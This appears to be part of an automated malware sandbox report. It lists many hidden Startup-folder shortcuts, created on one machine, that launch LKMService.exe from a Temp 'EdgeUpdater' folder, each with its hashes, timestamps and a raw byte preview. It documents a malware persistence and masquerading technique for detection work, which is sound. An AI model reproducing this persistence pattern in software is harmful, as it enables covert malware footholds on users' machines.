                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......sI6..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYoe..Temp..:......EW<2BYoe....^......................^..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7f7765716ecd48468fd42866f53e185b.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:42 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.933768698496093
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8XIDYlXPXv+RzmPgKLrTjiSAzav/42eEFsuqygm:8XIDYlf2RzaTsevgosryg
                                                                                                                                                                                                                                          MD5:46487C1FD295BF7324B50E153A1EB93C
                                                                                                                                                                                                                                          SHA1:200F028EDA690BD2B2C833D88B56AAF027F64AF6
                                                                                                                                                                                                                                          SHA-256:CE547395FDFB99098D967D17163F090D25BA40156888B97877F5844A5673A680
                                                                                                                                                                                                                                          SHA-512:8A7779EC1FD347BE6105AB062D779EFAFE5B487B62ECE4C6257F52E069F7A2E53F799617DFC69F9BA7D1EEDD6102E310632048CB3A04D36688573A1671DB8DD8
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......${...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......g..........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYTe..Temp..:......EW<2BYTe....^.....................w...T.e.m.p.....`.1.....BYVe..EDGEUP~1..H......BYVeBYVe.............................E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8249d808890c4adbb844a32dc8fcc90c.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:25 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.956964594771332
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8oisDYlXPXv+RDgKLj/jiSAzav/42eEFsuqygm:8oisDYlf2RP7sevgosryg
                                                                                                                                                                                                                                          MD5:48E767C5380AD952074362AB93B172DA
                                                                                                                                                                                                                                          SHA1:457861C545AD7B724F98AD9D45B6EE0153B4D48B
                                                                                                                                                                                                                                          SHA-256:62C6FE6B4F9F1D621946420D00FF8CCEB587C798067DF52D8EF93AECDFD2CA4E
                                                                                                                                                                                                                                          SHA-512:3C66CD5802BD7C69EC9E66B49A3F565B0D4AA0816ED97500891F1B96EC477CAB849256D436BBBDBA0DA92D8D44992B40D383CBA20E7CD39358FFD7E3B33FF504
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......ni-..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................)<.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_882f2ea546114f569d41d630426c0bbc.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:56 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.946034831642287
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:857cDYlXPXv+RIgKeuj/jiSAzav/42eEFsuqygm:85oDYlf2RC7sevgosryg
                                                                                                                                                                                                                                          MD5:9D12D511C91948B292A699CC1C496E19
                                                                                                                                                                                                                                          SHA1:8517A6F6B443A45C948097B66EB68436C3509ADC
                                                                                                                                                                                                                                          SHA-256:49B9629169AF75EF21A1F418009465EF7B7051A8BCE837D1BC41338A6E4FC8BF
                                                                                                                                                                                                                                          SHA-512:D72B9221A9B94A26FAFD7ED752582ACCE974095E26B3F69402ECE5003AF72EFA07E8657F4A557B6E6AFFBE5671583770906008112F2DCAADA4A7A410AE8F47FD
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${........-..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8cf57d72702e40c3b0a61c02602e4129.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:08 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.947730542727251
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8Q7cDYlXPXv+RLgKY0j/jiSAzav/42eEFsuqygm:8QoDYlf2Rk07sevgosryg
                                                                                                                                                                                                                                          MD5:FC2D7A807B72CD8FA3281623D95794FD
                                                                                                                                                                                                                                          SHA1:6986B28D0E6482B40248EF9E34B6560CCA445148
                                                                                                                                                                                                                                          SHA-256:95B100AAC1DB4712F64810B5F38C9366DE6EFC7863D28A2E25328690781B804D
                                                                                                                                                                                                                                          SHA-512:E98D9977C7EB6074FB1B7CE5382F8149F41BECA76B5CE1B5F0C691DB7F5E2F72DB1300A0E20824C611FC7180E42AD86F29C29B2FC9691E0E3A61A5F79615366F
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......:.Q..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYee..Temp..:......EW<2BYee....^.....................&...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8d7af83ba5b944efa6845139e48f6165.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:59 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.958733624846985
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8UsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8UsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:DDF84E3228234228DABAA41CB6D1B81B
                                                                                                                                                                                                                                          SHA1:B83838C713C920218801B1FB4F388F6243F336A1
                                                                                                                                                                                                                                          SHA-256:93F14C1E22D8D19EF7F79EA980A0F380DE7B43E1725B7276E55B290FC1C86909
                                                                                                                                                                                                                                          SHA-512:EDE200E92FBB27958DAD6A550FC1A09804ED82CC3DA59D032DF7BBADBB6526812C67D11A458F65E478BF34E7969944E2490EBB56F35025DFB276277FF676BFD1
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8e8ecdc88e2d46cfa55c46f7693e1dfd.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:58 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.949799973287987
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8q7cDYlXPXv+RIgKeuj/jiSAzav/42eEFsuqygm:8qoDYlf2RC7sevgosryg
                                                                                                                                                                                                                                          MD5:2058A267C7326B4DECD2A3D2C79B48CC
                                                                                                                                                                                                                                          SHA1:4F4C4180202C8F4F09718384304A02A755B9623A
                                                                                                                                                                                                                                          SHA-256:A43A8BA76ABBC1646266CF79933EB7C0AEB2A700AA98AA2A412D558BD11FA656
                                                                                                                                                                                                                                          SHA-512:69DDDE10ADB84A37F75174F9B47BBC4B0D795756FDE1174D9A9CB73D698F97E6CE9BD1B0D3FCC1225C9720784A007ED230D916C3FA0F183FE22A792CBD4900D2
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_905d293f7bcf4e1fb35a2d558ade10e5.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:56 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.953404265566666
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8DsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8DsDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:4C6115372DBFF42348AC1002314AF7EF
                                                                                                                                                                                                                                          SHA1:B62603B2D144B179F7992CF9E5A3F4F63F92DC57
                                                                                                                                                                                                                                          SHA-256:D5B6E76C86EB65E3725C4EE02A5C7453E0812A5891FB3F0BF136C7C095480034
                                                                                                                                                                                                                                          SHA-512:DF1B0DA91C3F06484F3A1E0EAEA25D25934D5C9426FE778F1F7D042B5995DCEEBC7B81B50C41EEF78F0629547CB7A2FDBCA3ECEA9A320AEC05AFAD2C0C38837C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......#..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_90b565cfb8d5467eb01c0089fa4d1a69.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:07 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.9477796208944484
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8Y7cDYlXPXv+RigKWj/jiSAzav/42eEFsuqygm:8YoDYlf2RP7sevgosryg
                                                                                                                                                                                                                                          MD5:0B2D8F77B39FC29F1D67A564AC7F78EB
                                                                                                                                                                                                                                          SHA1:68A23368564AD405626CCECF8B9B6FCCC6B2253B
                                                                                                                                                                                                                                          SHA-256:877BD25EE750BFAAEE4AAC5687F69EEA208C39113853E09BECE8FBDD223919A0
                                                                                                                                                                                                                                          SHA-512:6E9095E150CB56BE08D062EE3C1C3ECF5EB4C378429CC74883C5F17E8460156565D02A9696B13E8D727AA75E93A695BEF873333F41A8DD06B9484EF2D074B13F
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......1@...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYde..Temp..:......EW<2BYde....^......................<O.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_90db52d201554e3ba1e50023858960a2.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:26 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.960716257939758
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8TCsDYlXPXv+ROvgKybj/jiSAzav/42eEFsuqygm:8TCsDYlf2ROSb7sevgosryg
                                                                                                                                                                                                                                          MD5:A673D1DEEE2A7443A499C749E2B1AA25
                                                                                                                                                                                                                                          SHA1:79CF73CC68FDCCB1FF7151DFCDDD01E0E18268EB
                                                                                                                                                                                                                                          SHA-256:7268DFE82F2962CE7124254EFAE9791632C0EA5C34D03DFA5368E6B7DE912FF9
                                                                                                                                                                                                                                          SHA-512:6D863D136DFF76C3F8B035A92A4F72DC833282F13651CF4D5999158BC1BFE4A9722DCE588FB46FFE581BF739767DF89DB11BF963E353F29800E889860D916803
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......k...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYne..Temp..:......EW<2BYne....^......................5..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_94b4737f5a054c36bd0bc554b72d5bec.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:25 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.962051740168826
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8isDYlXPXv+RjgKqS7xj/jiSAzav/42eEFsuqygm:8isDYlf2Re4x7sevgosryg
                                                                                                                                                                                                                                          MD5:2AD33BFAC484DAC3BEFA33086834A44C
                                                                                                                                                                                                                                          SHA1:117AC6917D2FB52AF2FB0E66A9B3CB0FF182E9C8
                                                                                                                                                                                                                                          SHA-256:0AC7BBB547B78262DC62E8FD107D8B5D9A78D9FEC88B987B5126C10390CFCCDE
                                                                                                                                                                                                                                          SHA-512:36D745C43E1237AC4E8053BFBBE4CB52543105321D5068DDF851ED95D05094A377CEAFF1B6F76C5C4EF6AA128B2AAA6DC5FC2B0D78535B1804F6D017E669AB22
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......#.T..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYme..Temp..:......EW<2BYme....^......................<O.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9bc5d188b4b448aeb6a31847a5253a29.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:23 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.966296384609026
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8isDYlXPXv+RaPgKwj/jiSAzav/42eEFsuqygm:8isDYlf2RR7sevgosryg
                                                                                                                                                                                                                                          MD5:D1E1CF5EB3EC43893D4E849E43B55AD8
                                                                                                                                                                                                                                          SHA1:3E2E8F159052F5139EAD063DC1AFC9EAB96EAC95
                                                                                                                                                                                                                                          SHA-256:67D7E3065B3E9E08BC404594BBB415606D982F341E7D72D25AFAE39899BAFAE6
                                                                                                                                                                                                                                          SHA-512:F8FC09E885A012383CA77DBC1A9A534A37F2322D8FCD78764951F546596C1192180B7B5FDA082526574BC6FDFB4989A3538CB6CEA10DE6A5D7E37CE92C606F3C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
